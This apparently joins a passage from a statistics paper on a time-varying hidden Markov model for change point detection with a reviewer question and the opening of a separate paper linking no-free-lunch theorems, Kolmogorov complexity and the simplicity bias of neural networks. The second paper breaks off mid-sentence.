\mu_{\rightarrow t_k}(n) \cdot \mu_{t_k \leftarrow}(n), \quad Q(t_{k-1}(m) = 1, t_k(n) = 1) \propto \mu_{\rightarrow t_k}(m) \cdot \pi_{i,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k, t_k, \theta_k | t_{k-1}; \Pi_k, \alpha_k)]) \cdot \mu_{t_k \leftarrow}(n), \] where the recursive formula of message passing is given by: \[ \mu_{\rightarrow t_k}(n) = \sum_{m=1}^{n} \{\mu_{\rightarrow t_{k-1}}(m) \cdot \pi_{k,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k, t_k, \theta_k | t_{k-1}(m) = 1)])\} , \] \[ \mu_{t_k \leftarrow}(m) = \sum_{n=m}^{N} \{\mu_{t_k \leftarrow}(n) \cdot \pi_{k,m,n} \cdot \exp(E_{Q(\theta_k)}[\ln p(Y_k, t_k, \theta_k | t_{k-1}(m) = 1)])\} . \] Given the initial $\mu_{t_1}$ and $\mu_{t_K}$, each message flow can be iteratively evaluated. For the Gaussian example of Equation 1, the detailed expressions of Equation 2 and 3 are given in the Appendix B. After updating all variational distributions by taking one-step coordinate gradient ascent, we optimize hyperparameters $\Pi$ in M-step. By alternating between E and M steps, we simultaneously detect the change point locations and estimate the parameters of each regime using the maximum a posteriori probability (MAP) of variational distributions: $$\hat{\tau}_k = \arg\max_{\tau_k} Q(t_k(\tau_k) = 1), \quad \hat{\theta}_k = \arg\max_{\theta_k} Q(\theta_k).$$ The computation complexity of each iteration is $O(KN^2)$. When the length of the sequence grows, the convergence speed and memory usage become inhibited. To relieve the computational burden, we randomly sample a subset of observations chronologically in each iteration. The subset has a fixed length $S$, which is much smaller than the number of observations $S \ll N$. A local estimator with this subset is established under stochastic approximation that enjoys less computational complexity and guarantees convergence to global optimal (Robbins & Monro [1951]). In our simulations, the proposed procedure usually converges or reaches the predefined iteration limit within 30 iterations. Thus, we successfully reduce the computational cost of each EM step to $O(KS^2)$ and improve the computational efficiency. The complete procedure is summarized in Algorithm 1. Practically, the unknown prior knowledge of $K$ could be learned from data using 'ARD'. If we initialize our method using a Markov chain $[t_1, ..., t_K]$ with $\tilde{K} > K$. As the algorithm progresses, the learned transition matrix $\Pi$ reveals the probability of each location transition, and the estimated locations $\{\hat{\tau}_k\}_{k=1}^{\tilde{K}}$ are clustered together. Some of the successive change points will gradually converge to the same location, e.g., $\hat{\tau}_{L+1} = \hat{\tau}_{L+1+1} = ... = \hat{\tau}_{L+l+1}$ for some integer $l$. Therefore, the redundant regimes will vanish during the EM iteration and there are only $K$ unique locations remaining after convergence. 2.3 THEORETICAL ANALYSIS In this section, we provide a statistical analysis of how TV-HMM estimates the change point locations and numbers. We list the necessary notations and assumptions under which our theoretical result is established: A1: For fixed constants $T, K, D$, the underlying sequence on time interval $[0, T]$ consists of $K$ change points $0 < T_1 < ... < T_K < T_{K+1} = T$ and the random function $y(t) : \mathbb{R} \rightarrow \mathbb{R}^D$ represents the sample drawn from $\mathcal{N}(y | u_k, \Lambda_k)$ if $T_{k-1} < t < T_k$. A2: For any time interval $[m, n] \subseteq [0, T]$, the number of observations within this interval equals $O(N^{n-m})$. A3: The algorithm initializes $\tilde{K} = M_{K+1} - 1$ change points. Each corresponds to an equal-distance segment $[t_{i-1}, t_i]$, such that $t_{i+1} - t_i = \frac{T}{M_{K+1}}$. We can further categorize $\{t_i\}_{i=1}^{M_{K+1}-1}$ into two subsets: - Any $t_i$ with $i \in \{M_1, ..., M_K\}$ denotes the junction points, e.g., there is a true change point located within the interval $[t_{i-1}, t_i]$ and $y(t)$ within the interval does not identically distribute. - For $k = 1, ..., K + 1$, any $t_i$ with $i \in \{M_{k-1} + 1, ..., M_k - 1\}$ denotes the non-junction index, such that every $y(t)$ within the interval comes from the same distribution. Then we can show our method leads to a provable selection consistency of change point locations: **Theorem 1 (Location Consistency).** Assuming assumption A1-A3 hold, the marginal probability $Q(t_i(n) = 1)$ consistently estimates the location of the change point with the maximum exponential rate of $N$: - For non-junction points $t_i$ with $i \in \{M_{k-1} + 1, ..., M_k - 1\}$: $$Q(t_i(n) = 1) = \begin{cases} 1 & \text{if } n = T_k; \\ O(N^{-\frac{n-T_k}{T}}) & \text{if } n \in [T_{k-1}, T_k); \\ O(\exp(-N^{\min\{|n-T_k|, |n-T_{k-1}|\}})) & \text{if } n \notin [T_{k-1}, T_k]. \end{cases}$$ • For junction points \( t_i \) with \( i \in \{ M_k \}_{k=1}^K \): \[ Q(t_i(n) = 1) = \begin{cases} 1 & \text{if } n = T_k; \\ O(\exp(-N \frac{|n-T_k|}{T})) & \text{otherwise}. \end{cases} \] **Remark.** The assumption A3 guarantees that each \( Q(\theta_k) \) is initialized using the characteristic (e.g., mean and variance for the Gaussian case) of equal distance segments \([t_{k-1}, t_k]\), which is depicted with a box in Figure 1. Then Theorem 1 indicates these segments determine convergence rates of probabilities \( Q(t_k(n)) \), e.g., if the segment contains a true change point \( T_k \), \( t_k \) is a junction point and its \( Q(t_k(n)) \) would converge to 1 for \( n = T_k \) at the exponential rate of \( N \). On the other hand, non-junction points whose initial segments are identically distributed with the true regime will also converge at the rate up to the exponential of \( N \). Thus, as \( N \to \infty \), the MAP estimations of \( \{\hat{\tau}_k\}_{k=M_{k+1}-1}^{M_k} \) become an unduplicated set \( \{T_k\}_{k=1}^K \) and can drop those segments whose length are 0. ### 3 SYNTHESIS DATA ANALYSIS In this section, we evaluate our method on various simulations and real data. We first conduct numerical experiments to provide evidence for our theoretical result. Then we compare the performance of TV-HMM with that of other offline CPD methods in both simulated data and the real-world application. These results show the effectiveness and robustness of our method in terms of location detection and parameter estimation. Throughout the experiments, we evenly divide the sequence into \( \tilde{K} \) segments to fulfill A3 in Section 2.3. The details about initialization and hyperparameters setting are included in the Appendix D.1. #### 3.1 IN-DEPTH ANALYSIS OF THEOREM 1 To analyze the theoretical results with controlled experiments, we consider a normal mean-variance shift model, which is also studied in [Yamanishi & Takeuchi (2002); Matteson & James (2014)]. The performance of CPD is measured by mean absolute error (MAE). For true change point location \( \{l_1, l_2, \ldots\} \) and estimated \( \{\hat{l}_1, \hat{l}_2, \ldots\} \), MAE = \( \frac{1}{N} \sum_j \min_i |\hat{l}_j - l_i| \), which measures the sum of absolute distances of each estimated location with its closest true location. We first investigate the change of convergence rate by varying the value of \( N \) and the results are summarized in Figure 2. The top left plot (a) shows the small value of \( N \) results in fluctuations of the estimated number of change points; as the size of observations increases, the estimated number remains steady at the true value 4. Similarly, the performance of parameters estimation is in the bottom left plot (b), indicating the estimation error rapidly decreases as the length of sequences grows. All the results are repeated for 100 times with fixed initialization across all the cases and are consistent with Theorem 1. Thus, the convergence rate of the TV-HMM increases with the size of observations. To illustrate the results of automatic relevance determination, we also visualize the \( \pi_{k,i,j} \) before and after convergence, by taking the summation of \( \{\Pi_k\}_{k=1}^{\tilde{K}} \). Results are shown on the right of Figure 2. The top right plot (c) shows the initial upper triangular transition matrix and the bottom plot (d) is the converged result from Algorithm 1. Note that the converged transition matrix is extremely sparse. Those non-zero spots on the diagonal indicate the existence of unnecessary regimes with size 0. Other significant spots are near true change point locations, indicating the high relevance of these intervals with respect to the true regime. Then we infer the \( \{Q(t_k)\}_{k=1}^K \) for automatic model selection by leveraging the converged \( \{\Pi_k\}_{k=1}^{\tilde{K}} \) as prior distributions. Figure 2: Left: The line plot (a) of the average estimated number of change points and the boxplot (b) of MAE varying with sequence length; Right: The heatmap of the sum of initial (c) and converged (d) $\tilde{K}$ transition matrices $[\Pi_1, ..., \Pi_{\tilde{K}}]$. 3.2 Evaluation on Simulated Data Effectiveness of our method is demonstrated by comparison with several well-developed CPD methods, including WBSLSW (Korkas & PryzlewiczVI, 2017), ECP3O (Zhang et al., 2017), KCP (Harchaoui & Cappe, 2007), $D_m$-BOCD (Altamirano et al., 2023) and another HMM-based method, DPHMM (Ko et al., 2015). The performance of CPD is measured by the Rand index, which is the similarity between two different data partitions (Lajugie et al., 2014; Fleming et al., 2023). It produces a value between 0 and 1, where 1 indicates perfect agreement. We consider three change-point models for the simulation, each with a significant characteristic (Matteson & James, 2014; Chang et al., 2019). For Model 1, each regime follows either a binomial, Poisson, or normal distribution, with corresponding parameter variations. For Model 2, sequences are generated from 5-dimensional normal distributions, with either mean or covariance matrix shifts, and Model 3 increases the dimension to 10. Our simulations cover all common regime shifts in the piecewise i.i.d setting. For more details about the simulation setups, please refer to Appendix D.3. Table 1 shows the performance of all methods for all cases. For Model 1, the accuracy of our methods is in line with DPHMM and outperforms the other four methods. Our method is the best among all candidate methods in Model 2. For Model 3, our method is also comparable to the best method ECP3O. The results indicate that our method performs consistently across all three models while existing methods suffer from fluctuation in performance. | Method | Model 1 | Model 2 | Model 3 | |------------|---------|---------|---------| | WBSLSW | 0.9068 | 0.3596 | 0.3849 | | ECP3O | 0.9156 | 0.9580 | 0.9737 | | DPHMM | **0.9637** | 0.8727 | 0.8869 | | KCP | 0.9501 | 0.8436 | 0.8836 | | $D_m$-BOCD | 0.8123 | 0.8411 | 0.8413 | | TV-HMM | 0.9523 | **0.9756** | 0.9615 | Table 1: The performance of different CPD methods measured by the Rand index. | Parameter | D=1 | D=5 | D=10 | |-----------|-------|-------|-------| | MSE($\hat{u}$), Mean | 0.1885 | 0.1286 | 0.1868 | | MSE($\hat{u}$), SD | ± 0.1635 | ± 0.0625 | ± 0.0971 | | MSE($\hat{\Lambda}$), Mean | 0.9593 | 1.3382 | 4.1460 | | MSE($\hat{\Lambda}$), SD | ± 1.7317 | ± 0.5381 | ± 0.1345 | Table 2: MSE of the estimated posterior parameters $u$ and $\Lambda$. The proposed TV-HMM is able to simultaneously estimate the characteristics of each estimated regime, which is the mean and precision for Equation 1. We test the proposed method under different data dimensions. The parameter estimation is measured by the Mean Squared Error (MSE). We summarize the results in Table 2. Our method provides promising estimation results since the MSE of the estimated posterior mean (\(\hat{u}\)) and ground truth (\(u\)) falls within the range of 0.1 to 0.2 in all cases. For the posterior precision (\(\hat{\Lambda}\)) estimation, MSE is relatively larger than the other cases, which is reasonable since the number of parameters grows substantially with dimension \(D\). Furthermore, the small standard deviation (SD) of MSE indicates the stability of our estimation across all setups. 3.3 Evaluation on Real-world Dataset Robustness of our method is evaluated on the Well-log dataset from the real-world application. The data contains 4050 nuclear magnetic resonance measurements during the drilling procedures (Ruanadh & Fitzgerald [2012]). Note that this sequence is corrupted by outliers, which have a significant effect on change point detection. To tackle this problem, Altamirano et al. (2023) develop the \(D_m\)-BOCD that is incorporated with diffusion score matching, to reduce the effect of outliers on change point detection. This adaptation allows \(D_m\)-BOCD to work on the corrupted dataset. Therefore, we compare the estimated locations of TV-HMM with their results, and the comparison is shown in Figure 3. The detected regime is separately colored, indicating the existence of a distributional shift. Most of the outliers are not identified as change points, and the results of TV-HMM are essentially in line with that in (Altamirano et al., 2023), which are plotted in a color bar at the bottom. The grey band indicates the mismatch of detected regimes. There is a clear change point at the time stamp 1540 that is not identifiable using \(D_m\)-BOCD. Therefore, our method exhibits a comparative advantage on the Well-log dataset and demonstrates robustness to outliers. ![Figure 3](image) Figure 3: Estimated change point locations of Well-log data, color band (1) represents estimated regimes from TV-HMM, (2) represents estimated regimes from \(D_m\)-BOCD. The grey bands represent the mismatches between the two methods. 4 Extension of TV-HMM with Maximum Mean Discrepancy Previous results are developed based on the parametric likelihood function. Here, we alleviate the assumption using the kernel approach and propose a semi-supervised TV-HMM that is robust against outliers and model misspecification. Our motivation is that the expected log-likelihood term in the message function can be regarded as a distance measure between the observations subset \(Y_k\) and the characteristics of \(k\)-th regime \(\zeta_k\). Thus, we can generalize the message functions of Equation 3 using Maximum mean discrepancy (MMD): \[ \mu_{t_k}(n) = \sum_{m=1}^{n} \left\{ \mu_{t_{k-1}}(m) \cdot \pi_{k,m,n} \cdot \exp \left[ -\frac{n-m+1}{G} \| \mathbb{E}_{P_m} \varphi(y) - \mathbb{E}_{Q(\zeta_k)} \varphi(\zeta_k) \|_H \right] \right\}, \] \[ \mu_{t_{k-1}}(m) = \sum_{n=m}^{N} \left\{ \mu_{t_k}(n) \cdot \pi_{k,m,n} \cdot \exp \left[ -\frac{n-m+1}{G} \| \mathbb{E}_{P_m} \varphi(y) - \mathbb{E}_{Q(\zeta_k)} \varphi(\zeta_k) \|_H \right] \right\}, \] where \(\hat{P}_m\) denotes the empirical distribution consisting of \(n-m+1\) successive observations starting from time index \(m\) to \(n\), and \(\varphi : \mathbb{R}^D \rightarrow H\) represents the mapping to reproducing kernel Hilbert space. Algorithm 2 Training Procedure for Semi-Parametric Time-Varying Hidden Markov Model Input: Observed sequence $Y$; Initial number change points $\tilde{K}$; Maximum Iteration $I$; Step size $\eta$; Number of posterior samples $S$; Output: Variational distributions $\{Q_\Phi(\zeta_k)\}_{k=1}^{K+1}$; Marginal probability of change point locations $\{Q(t_k)\}_{k=1}^{K}$; 1: Initialization of $\{Q_\Phi(\zeta_k)\}_{k=1}^{K+1}$ with the distributions of initial regimes; 2: for $1 \leq i \leq I$ do 3: for $1 \leq k \leq K + 1$ do 4: Sample $\{\zeta^*_k\}_S \sim Q_\Phi(\zeta_k)$; Compute $\|\mathbb{E}_{P_m^n}[\varphi(y)] - \frac{1}{S}\sum_{s=1}^{S}\varphi(\zeta^*_k)\|_H$ for any $1 \leq m \leq N$; 5: end for 6: Update $\{Q^i_k(n,m)\}_{k=2}^{K}$ using message functions of Equation 4, $\pi_{k,m,n} \leftarrow \pi_{k,m,n} + \eta \cdot Q^i_k(n,m)$ 7: Compute $\mathcal{J} \leftarrow \text{MMD-ELBO}$ using Equation 4, Update $\Phi \leftarrow \Phi + \eta \cdot \frac{\partial \mathcal{J}}{\partial \Phi}$ 8: end for space $H$, and $G$ is a constant that adjusts the value of MMD. Unlike Equation 2 in the parametric model, where $Q(\theta)$ must be derived using variational inference, $Q(\zeta)$ can be generally modeled using non-parametric density estimation [Botev et al., 2010] and deep generative models [Kingma & Welling, 2013; Rezende et al., 2014]. Denoting the distribution of $\zeta$ as $Q_\Phi(\zeta)$, where $\Phi$ is the model parameters, e.g. the weight values of neural networks, we propose a new MMD-based evidence lower bound (MMD-ELBO) as the objective function for $\Phi$ learning. The new loss function improves the robustness by replacing the likelihood functions in the original ELBO with a kernel-embedded distance. The formula of MMD-ELBO is given by: $$\sum_{k=1}^{K+1} \sum_{m=1}^{N} \sum_{n \geq m} \frac{(m-n-1)}{G} \cdot Q^i_k(n,m) \|\mathbb{E}_{P_m^n}[\varphi(y)] - \mathbb{E}_{Q_\Phi(\zeta_k)}[\varphi(\zeta_k)]\|_H + \text{KL}(Q_\Phi(\zeta_k)||p(\zeta_k)),$$ where $Q^i_k(n,m)$ denotes the joint variational probability that $t_k(n) = 1$ and $t_{k-1}(m) = 1$ obtained from MMD-based message passing of Equation 4. For each iteration, we can evaluate the value of MMD-ELBO by sampling from $Q_\Phi(\zeta_k)$ and update $\Phi$ using the re-parameterization trick [Kingma et al., 2015]. The pseudo-code of semi-parametric change point detection is summarized in Algorithm 2. We illustrate the performance of semi-parametric TV-HMM through three non-Gaussian examples, where the underlying sequence is generated from Poisson, chi-squared, and exponential distribution, respectively. The setup of the simulations can be found in Appendix D.4. Our performance is promising for all cases in terms of the Rand index, which is 0.9447 for Poisson, 0.8686 for chi-squared, and 0.8911 for exponential distribution. Note that we do not incorporate any distributional knowledge as prior, the results indicate our method has robust performance over a broader class of data distributions. Relation with Parametric TV-HMM: We illustrate its relation with the previously-discussed parametric TV-HMM. Under the Gaussian assumption with fixed variance, the likelihood $\mathbb{E}_{Q(\theta_k)} \ln p(Y_k | \theta_k, t_{k-1} = m, t_k = n)$ in previous messenger passing Equation 3 is proportional to: $$-\sum_{i=m}^{n} E_{u_k}(y_i - u_k)^T \Lambda_k(y_i - u_k) \propto -(n-m+1) \cdot \|\sqrt{\Lambda_k} \mathbb{E}_{P_m^n}[y] - \sqrt{\Lambda_k} \mathbb{E}_{Q(u_k)}[u_k]\|^2,$$ which is a special case of MMD with linear mapping $\varphi(x) = \sqrt{\Lambda_k} x$. 5 CONCLUSION In this paper, we present TV-HMM, a time-varying Hidden Markov Model that enables simultaneous detection of change points and estimation of regime characteristics. Our method utilizes a variational EM algorithm incorporating stochastic approximation, and we prove its convergence rate for each change point location. Furthermore, we prove that our algorithm consistently selects the true number and locations of change points. Extensive numerical experiments provide evidence for our theoretical results and demonstrate the promising performance of our approach. In cases where the data distributions are unknown, we generalize our method using MMD and propose semi-parametric TV-HMM that does not rely on any distributional assumption. However, a limitation of current research is that CPD methods are primarily established on the piecewise i.i.d setting. In the future, we hope to extend our framework to a broader class of CPD settings. REFERENCES Ryan Prescott Adams and David JC MacKay. Bayesian online changepoint detection. *arXiv preprint arXiv:0710.3742*, 2007. Matias Altamirano, François-Xavier Briol, and Jeremias Knoblauch. Robust and scalable bayesian online changepoint detection. *arXiv preprint arXiv:2302.04759*, 2023. Elena Andreou and Eric Ghysels. Detecting multiple breaks in financial market volatility dynamics. *Journal of Applied Econometrics*, 17(5):579–600, 2002. Jushan Bai and Pierre Perron. Estimating and testing linear models with multiple structural changes. *Econometrica*, pp. 47–78, 1998. Daniel Barry and John A Hartigan. A bayesian analysis for change point problems. *Journal of the American Statistical Association*, 88(421):309–319, 1993. Yvonne M Bishop, Stephen E Fienberg, and Paul W Holland. *Discrete multivariate analysis: Theory and practice*. Springer Science & Business Media, 2007. David M Blei, Alp Kucukelbir, and Jon D McAuliffe. Variational inference: A review for statisticians. *Journal of the American statistical Association*, 112(518):859–877, 2017. ZI Botev, JF Grotowski, and DP Kroese. Kernel density estimation via diffusion. *Annals of Statistics*, 38(5):2916–2957, 2010. Kenneth P Burnham and David R Anderson. Multimodel inference: understanding aic and bic in model selection. *Sociological methods & research*, 33(2):261–304, 2004. Wei-Cheng Chang, Chun-Liang Li, Yiming Yang, and Barnabás Póczos. Kernel change-point detection with auxiliary deep generative models. *arXiv preprint arXiv:1901.06077*, 2019. Siddhartha Chib. Estimation and comparison of multiple change-point models. *Journal of econometrics*, 86(2):221–241, 1998. Matt Fleming, Piotr Kolaczkowski, Ishita Kumar, Shaunak Das, Sean McCarthy, Pushkala Pattabhiramam, and Henrik Ingo. Hunter: Using change point detection to hunt for performance regressions. In *Proceedings of the 2023 ACM/SPEC International Conference on Performance Engineering*, pp. 199–206, 2023. Andrew B Gardner, Abba M Krieger, George Vachtsevanos, Brian Litt, and Leslie Pack Kaelbing. One-class novelty detection for seizure analysis from intracranial eeg. *Journal of Machine Learning Research*, 7(6), 2006. Subhashis Ghosal, Jüri Lember, and Aad Van Der Vaart. Nonparametric bayesian model selection and averaging. *Electronic Journal of Statistics*, 2:63–89, 2008. Zaid Harchaoui and Olivier Cappé. Retrospective mutiple change-point estimation with kernels. In *2007 IEEE/SP 14th Workshop on Statistical Signal Processing*, pp. 768–772. IEEE, 2007. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. *Advances in neural information processing systems*, 33:6840–6851, 2020. Yoshinobu Kawahara, Takehisa Yairi, and Kazuo Machida. Change-point detection in time-series data based on subspace identification. In *Seventh IEEE International Conference on Data Mining (ICDM 2007)*, pp. 559–564. IEEE, 2007. Rebecca Killick, Paul Fearnhead, and Idris A Eckley. Optimal detection of changepoints with a linear computational cost. *Journal of the American Statistical Association*, 107(500):1590–1598, 2012. Diederik P Kingma and Max Welling. Auto-encoding variational bayes. *arXiv preprint arXiv:1312.6114*, 2013.
X7nz6ljg9Y
End of 3.1: “allowing us to reject the hypothesis that the labeling functions are drawn uniformly at random with extremely high confidence.” Who would make the claim that labeling functions for real-world datasets are drawn uniformly at random?
The No Free Lunch Theorem, Kolmogorov Complexity, and the Role of Inductive Biases in Machine Learning Anonymous authors Paper under double-blind review Abstract No free lunch theorems for supervised learning state that no learner can solve all problems or that all learners achieve exactly the same accuracy on average over a uniform distribution on learning problems. Accordingly, these theorems are often referenced in support of the notion that individual problems require specially tailored inductive biases. While virtually all uniformly sampled datasets have high complexity, real-world problems disproportionately generate low-complexity data, and we argue that neural network models share this same preference, formalized using Kolmogorov complexity. Notably, we show that architectures designed for a particular domain, such as computer vision, can compress datasets on a variety of seemingly unrelated domains. Our experiments show that pre-trained and even randomly initialized language models prefer to generate low-complexity sequences. Whereas no free lunch theorems seemingly indicate that individual problems require specialized learners, we explain how tasks that often require human intervention such as picking an appropriately sized model when labeled data is scarce or plentiful can be automated into a single learning algorithm. These observations justify the trend in deep learning of unifying seemingly disparate problems with an increasingly small set of machine learning models. 1 Introduction The problem of justifying inductive reasoning has challenged epistemologists since at least the 1700s (Hume, 1748). How can we justify our belief that patterns we observed previously are likely to continue into the future without appealing to this same inductive reasoning in a circular fashion? Nonetheless, we adopt inductive reasoning whenever we learn from past experience. More recently, in the late 1990s, no free lunch theorems emerged from the computer science community as rigorous arguments for the impossibility of induction in contexts seemingly relevant to real machine learning problems (Wolpert, 1996; Wolpert & Macready, 1997). One such no free lunch theorem for supervised learning states that no single learner can achieve high accuracy on every problem (Shalev-Shwartz & Ben-David, 2014). Another states that every learner is equally good in expectation over a uniform distribution on learning problems (Wolpert, 1996). Such a world would be hostile to inductive reasoning. The assumption that labelings are drawn uniformly ensures that training data is uninformative about unseen samples. In contrast to this dismal outlook on machine learning, naturally occurring data involve structure that could be shared even across seemingly disparate problems. If we can design learning algorithms with inductive biases that are aligned with this structure, then we may hope to perform inference on a wide range of problems. In this work, we explore the alignment between structure in real-world data and machine learning models through the lens of Kolmogorov complexity. The Kolmogorov complexity of an output is defined as the length of the shortest program under a fixed language that produces it. In Section 3, we explain the connection between Kolmogorov complexity and compressibility. We note that virtually all data drawn from a uniform distribution as assumed by the no free lunch theorem of Wolpert (1996) cannot be significantly compressed, yet relevant real-world datasets are highly compressible. In particular, neural networks themselves can be used to create compressions of data labelings, upper bounding their Kolmogorov complexity. We then demonstrate in Section 4 that modern neural networks also prefer low Kolmogorov complexity, complementing the low complexity of actual data. While models implemented on a computer cannot generate data with complexity exceeding the length of their associated program, we find they actually prefer data that is far simpler. We formulate simple languages for generating numerical sequences, under which we can directly measure the Kolmogorov complexity of a sequence. We use these languages to inspect the simplicity bias of both pre-trained and randomly initialized language models. GPT-3 (Brown et al., 2020) reliably favors less complex sequences, and bigger and better GPT-3 variants even more so. Notably, randomly initialized GPT models share this simplicity bias. To further emphasize the universality of this simplicity bias, we reshape tabular data from diverse domains, including click prediction and airline delay prediction, into images and feed them through convolutional computer vision architectures, showing that these vision architectures prefer correct labelings to random ones, even on data which do not remotely resemble natural images and have no spatial structure. We then compute cross-domain generalization bounds via Kolmogorov complexity. A common intuition associated with no free lunch theorems dictates that since a single learner cannot solve all problems, practitioners must inspect data and manually select an appropriate learner for the specific problem at hand. For example, a practitioner might select a more constrained model to avoid overfitting on small datasets, or convolutional architectures to accommodate natural image data. To the contrary, we show in Section 5 that the meta learner which selects the best learning algorithm from cross validation suffers little from overfitting even when the number of models investigated is large, and the cost of selection is quickly overcome by gains in validation accuracy. Moreover, a single learner, which supports a variety of functions but prefers simple ones, can solve a wide range of problems. We show that flexible models accompanied by a penalty encouraging simple solutions can solve problems at a variety of sample sizes. In fact, the historic evolution of machine learning supports the ability of a single learner to perform diverse tasks (see Appendix A, Figure 4) as highly task-specific pre-neural algorithms, such as LDA (Blei et al., 2003) and HOG (Dalal & Triggs, 2005), were replaced by neural architectures such as convolutional or recurrent models, and transformers can now handily perform all tasks listed in Appendix A, Figure 4. We summarize our contributions as follows: • We demonstrate the direct connection between compressibility and learnability that is implicit in no free lunch theorems by deriving a new no free lunch theorem using Kolmogorov complexity. • We show that the low Kolmogorov complexity of real datasets can be directly derived from the machine learning models used to fit them. • We compute the first cross-domain PAC-Bayes generalization bounds which show that neural networks such as convolutional architectures have low complexity biases that are relevant even on diverse tabular data far from what they were designed for. • We demonstrate GPT-3’s preference for sequences generated by short expression trees, and we find that even randomly initialized language models have a simplicity bias. In short, while the no free lunch theorems are regularly used to justify the need for specially tailored inductive biases (Ho & Pepyne, 2002; Whitley & Watson, 2005; Ciuffo & Punzo, 2013; Watson et al., 1999), we show that real-world data are not only highly structured, but share their structure to a large extent. We further show how intervening to embrace a flexible hypothesis space together with a simplicity bias can lead to effective learners in small and large data regimes. Our findings explain recently observed phenomena, ranging from the generality of transformers, to the lack of overfitting on the test sets of popular benchmarks noted in Recht et al. (2019). We summarize several key takeaways throughout the paper in blue. In Appendix I, we provide an extended discussion. 2 BACKGROUND We provide background on the no free lunch theorems, PAC-Bayes, and Kolmogorov complexity. We include an extended background discussion in Appendix B. No free lunch theorems. No free lunch theorems (NFL) state that without making strong assumptions, a single algorithm cannot simultaneously solve all problems well. In supervised learning, the focus of this paper, Wolpert (1996) and Schaffer (1994) famously prove that every learner—a function that takes in labeled data and outputs a labeling function for the associated domain—achieves the same average accuracy of 50% on unseen examples over all binary classification problems. Shalev-Shwartz & Ben-David (2014) instead do not assume a particular distribution over learning problems and prove that for every learner, there exists a task on which the learner achieves poor accuracy with high probability over training splits, whereas another learner achieves perfect accuracy. Notably, the latter NFL computes accuracy over all data, not just “off-training” samples. The practical relevance of this theorem again hinges on the distribution over real-world learning problems and how well it aligns with the inductive bias of a learner. In this paper, we argue that the real-world learning problems we care about share a high degree of common structure, and the inductive biases of neural networks are well-aligned with such problems. **Kolmogorov complexity and compression.** Kolmogorov complexity quantifies the structure in a bitstring, measuring the extent to which it can be compressed. For a fixed programming language $L$, the Kolmogorov complexity of data $x$, $K(x)$, is the length of the shortest program in that language that outputs $x$ (Kolmogorov, 1963). Analogous to conditional entropy, $K(y|x)$ is defined as the length of the shortest program which inputs $x$ and outputs $y$. Kolmogorov complexity provides a mathematical formalization of simplicity and Occam’s razor, which encompasses many related concepts like Shannon information, compression, and minimum description length (MDL) (Li et al., 2008). While objects with large Kolmogorov complexity are impossible to verify (Chaitin, 1974), they are abundant over all possible bitstrings. All but exponentially few sequences of a given length have near maximal Kolmogorov complexity and are thus incompressible. Taken over the uniform distribution over bitstrings $x$, $P(K(x) \leq n - k) \leq 2^{1-k}$. However as we will discuss, these high complexity objects are extremely uncommon in practice. **Universal induction.** Inspired by Kolmogorov complexity, a line of work introduces universal induction methods, which prefer low complexity answers (Solomonoff, 1964; Hutter, 2000; Lattimore & Hutter, 2013; Nakkiran, 2021). Notably, Solomonoff induction (Solomonoff, 1964; Rathmanner & Hutter, 2011) makes predictions by applying Bayes rule to the universal prior which favors low complexity, and provides learning guarantees. Rather than formalizing theoretical learners that rely on Kolmogorov complexity, which is in general uncomputable, Fernández-Delgado et al. (2014) and Gómez & Rojas (2016) test popular machine learning algorithms on a diverse array of datasets to see if any existing algorithms are plausibly universal. Another line of work shows that a single transformer model can perform well on many problems (Müller et al., 2022; Hollmann et al., 2022). **PAC-Bayes generalization theory.** The PAC-Bayes framework is a convenient paradigm for proving generalization bounds on parametric models, while avoiding the pitfalls of uniform convergence. Rather than considering all elements of the hypothesis class on equal footing, we choose prior and posterior distributions over the parameters, and the generalization gap for elements of the posterior depends merely on the discrepancy between the two as measured by the KL divergence. This framework can explain many favorable properties of neural networks like flat minima (Hochreiter & Schmidhuber, 1997), noise resilience (Arora et al., 2018), and compressibility (Zhou et al., 2018). It can also provide nonvacuous generalization bounds, with recent bounds drawing directly from Kolmogorov complexity and the universal prior (Lotfi et al., 2022). **On the relationship between our contributions and existing literature.** (1) In contrast to previous works which counter the no free lunch theorem by observing that a single model can achieve better-than-average empirical accuracy across diverse datasets (Fernández-Delgado et al., 2014; Gómez & Rojas, 2016), we explain and formalize the structures which are universal across such data distributions using Kolmogorov complexity. Relating this formalism to learning, we then show why low complexity is fundamental to such successes of machine learning models by proving a novel no free lunch theorem directly using Kolmogorov complexity. (2) The preference we demonstrate for low complexity emerges naturally in a variety of models, from transformer language models to convolutional neural networks, and requires no special interventions as proposed in Schmidhuber (1997) or Hinton & Van Camp (1993). (3) Existing generalization bound literature tunes priors on specific data distributions (Dziugaite & Roy, 2017; 2018; Pérez-Ortiz et al., 2021; Dziugaite et al., 2021) in line with the idea, often drawn from no free lunch theorems, that each domain requires a specially tailored model. In contrast, we demonstrate that neural networks can compress a wide range of datasets in domains they were not even designed for, and that this compressibility can explain generalization via PAC-Bayes generalization bounds. (4) Common wisdom dictates that neural network architectures must be carefully chosen for specific problems or sample sizes (Grinsztajn et al., 2022; Brigato & Iocchi, 2021; Lee et al., 2021), but we instead show through the formalism of complexity and experiments that specialized models can in principle be combined into a single learner which can perform well on a wide variety of problems and sample sizes. Moreover, we show that the cost of model selection is minimal, explaining recently observed phenomena such as a lack of overfitting to the test sets of popular benchmarks (Recht et al., 2019). 3 UNPACKING THE NO FREE LUNCH THEOREM WITH KOLMOGOROV COMPLEXITY The often cited no free lunch theorem of Wolpert (1996) states that all learners perform the same when averaged over a uniform distribution on all possible datasets. However, since most possible datasets are incompressible, the assumption of uniform samples subtly selects high complexity incompressible data, where learning is fundamentally impossible. We elucidate the centrality of complexity in NFL theorems by deriving a new NFL theorem which uses the incompressibility of random data to show why on this data learning is impossible. In Appendix C, we provide a brief introduction to bounding the Kolmogorov complexity of a dataset by compressing it and including the file sizes of both compressed file and decompression code. Through hypothesis testing, we rule out the possibility that real datasets are as high complexity as randomly drawn ones. 3.1 NNs AS COMPRESSORS OF THE LABELING FUNCTION Relevant to supervised learning, we show that not only are unlabeled datasets compressible—the labeling functions are too. Further, we can demonstrate their compressibility concretely using trained models as compressors. Given a labeled dataset \( D = (X, Y) = \{(x_i, y_i)\}_{i=1}^n \), any likelihood model \( p(y|x) \)—regardless of whether the top predictions are correct—can be used to generate a lossless compression scheme to encode the dataset labels \( Y \) given the inputs \( X \). Using a stream code such as arithmetic coding (Witten et al., 1987), in combination with the probability model \( p(y|x) \), the labels can be encoded in \( 